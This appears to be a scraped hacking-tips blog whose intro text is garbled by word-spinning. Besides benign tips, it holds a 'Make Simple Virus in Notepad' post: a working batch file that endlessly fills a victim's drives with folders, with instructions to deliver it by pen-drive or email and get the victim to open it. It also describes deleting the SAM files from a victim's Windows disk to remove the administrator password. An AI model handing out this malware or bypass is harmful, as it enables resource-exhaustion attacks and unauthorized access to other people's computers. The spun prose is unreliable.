Tuesday, 17 May 2016

Cryptography

To become a successful hacker you would like to master the art of cryptography. Encryption and decoding square measure vital skills in hacking. Encryption is wide done in many aspects of data system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted type such as passwords. While hacking a system, these encrypted codes needs to be broken, which is known as decoding.

Hacking Simple Step

Hacking is an partaking field however it's sure as shooting rough. To become a hacker one has to have an angle and curiosity of learning and adapting new skills. You must have a deep data of pc systems, programming languages, operating systems and the journey of learning goes on and on. Some people suppose that a hacker is continuously a criminal and do amerciable activities however they're wrong. Actually several massive corporations rent hackers to shield their systems and knowledge and square measure extremely paid. We have ready a listing of twelve most significant steps necessary to become a hacker, have a deeper look


  C language:

C programming is the base of learning UNIX/LINUX as this OS is coded in C programming which makes it the foremost powerful language as compared to different programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

Thursday, 15 January 2015

DEFINITIONS:VIRUS, WORMS, TROJAN HORSE, LOGIC BOMBS, BACTERIA & BLENDED THREATS

1. Viruses:

                                               

Viruses cannot spread without the help of us humans. They are like parasites because they need

a host to attach themselves to. The host is usually a legitimate looking program or file. Once this program is

launched, the virus is executed and infects other files on your computer. Viruses can be very destructive.

They can do damage to your computer hardware, software and files. Viruses are spread through the sharing

of files and are many times sent within emails via attachments.

2. Worms:


 A worm is a malicious program that can replicate itself onto other computers on a network.

Unlike a virus, worms don’t need a human to be able to spread and infect systems. Once it infects a system,

it uses that system to send out other copies of itself to other random systems attempting to infect them.

3. Trojan Horse:


 A trojan horse is a malicious program that can be used to do silly things to a system like

changing its desktop, mess with the user interface, and take control of your mouse. It can also be used for

some serious things like accessing your data, erasing your files, stealing your passwords, and capturing your

keystrokes.


4. Logic Bombs:


 Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain

time or until a user does a certain action which causes it to be executed. When it is triggered it performs a

certain function that the program wasn’t intended to do.

5. Bacteria :

 Bacteria make many copies of themselves and eventually end up taking up all of the computers recourses

such as all of its processor power, memory and disk space. This results in the legitimate user losing access

to those resources.

6. Blended Threats :
 Blended threats combine all of the characteristics of the above and use them along with system

vulnerabilities to spread and infect machines.

Monday, 12 January 2015

Make Simple Virus in Notepad

Step 1 : We will Create a Virus

Step 2 : We will Check it on Victims Computer.

[ Note : Don't try it on your computer ]

Step 1: Open Notepad and Copy the Following code in Notepad.

Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


Step 2: Give it to Victim

Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More Folder in C,D,and E drive.

Saturday, 27 December 2014

Video As Desktop Wallpaper

   1. Open VLC Media Player.
  
2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel

   3. Then Choose DirectX video output from output dropdown list

     as shown in below image .
Video wallpaper

  4. Save the changes ans restart VLC Media Player.

  5. Play any video you would like to set as your desktop wallpaper.

  6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper


  7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.

  8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.

Hide File Behind Image

1. Select an image to be used for hiding file behind the image.
 
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
 
3. And most important is that paste both the files on desktop. You may do this anywhere instead of 
desktop if you have some basic understanding of command line.
 
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.
 
cd desktop

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.

 Copy /b imagename.jpg + filename.rar finalimage.jpg
 
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don’t forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.
    
1. Open winrar
   
2. Now locate your image and open it or simply drag your image in winrar.
   
3. Extract the file and done.

“Delete administrator Password” without any software

Step 1. Put your hard disk of your computer in any other pc .

Step 2. Boot that computer and use your hard disk as a secondary hard disk (D’nt boot as primary hard disk ).


Step 3. Then open that drive in which the victim’s window(or your window) is installed.
 

Step 4. Go to location windows->system32->config
 

 Step 5.And delete SAM.exe and SAM.log
 

Step 6. Now remove hard disk and put in your computer.
 
Step 7. And boot your computer